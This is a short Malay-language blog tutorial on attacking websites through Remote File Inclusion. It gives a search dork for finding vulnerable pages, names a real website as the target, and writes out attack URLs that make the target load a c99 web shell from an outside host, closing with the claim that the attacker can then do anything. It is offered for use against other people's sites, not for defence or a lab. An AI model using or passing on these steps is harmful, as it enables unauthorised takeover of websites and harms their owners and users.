RFI ni singkatan kepada Remote File Inclusion.Senang cerita dengan kelemahan RFI terhadap sesebuah laman web, penyerang boleh "include file remotely" iaitu melancarkan sesuatu file dari server lain.
Ok jom mula~~
1. Mula-mula cari web vuln guna dork :
inurl:index.php?page=
Dork lain :http://pastebin.com/EgTx8mjH
2. Ok sekarang masa untuk test sama ada web yang kita dapat vuln atau tidak.Cara nya ialah dengan menambah url website apa-apa di hujung url website yang kita nak test.
Dalam tutorial ni aku akan guna website : http://www.cbspk.com/v2/index.php?page=
Baiklah sekarang tambahkan url http://www.google.com di belakang page=
Contoh :http://www.cbspk.com/v2/index.php?page=http://www.google.com
Dalam tutorial ni aku akan guna website : http://www.cbspk.com/v2/index.php?page=
Baiklah sekarang tambahkan url http://www.google.com di belakang page=
Contoh :http://www.cbspk.com/v2/index.php?page=http://www.google.com
Tekan enter.Boom! laman web google terpapar di website itu.
Ini bermakna website ini VULNERABLE!!
Ini bermakna website ini VULNERABLE!!
4. Sekarang untuk melancarkan serangan, korang perlu cari shell yang korang nak guna.Korang boleh dapatkan disini :http://www.sh3ll.org/
Pilih salah satu shell yang korang nak, dan click .txt? di bawah Included .txt?
Rujuk gambar :
 |
| Click .txt? pada mana2 shell yang korang nak guna |
5. Baiklah sekarang, copy url/link shell korang tu.
Selepas itu paste link tu di hujung url website target kita tadi.Sama macam korang letak link google tu paste di hujung page=
Contoh :
http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?
http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?
note : jangan lupa letak tanda ? di hujung url shell korang tu!Kalau tak shell tu tak boleh dilancarkan.
Tekan enter!
Sekarang shell telah dilancarkan :D
Sekarang shell telah dilancarkan :D
6. Sekarang korang boleh buat apa saja yang korang nak!
Baiklah sampai sini sahaja.Assalamualaikum~~
0 comments:
Post a Comment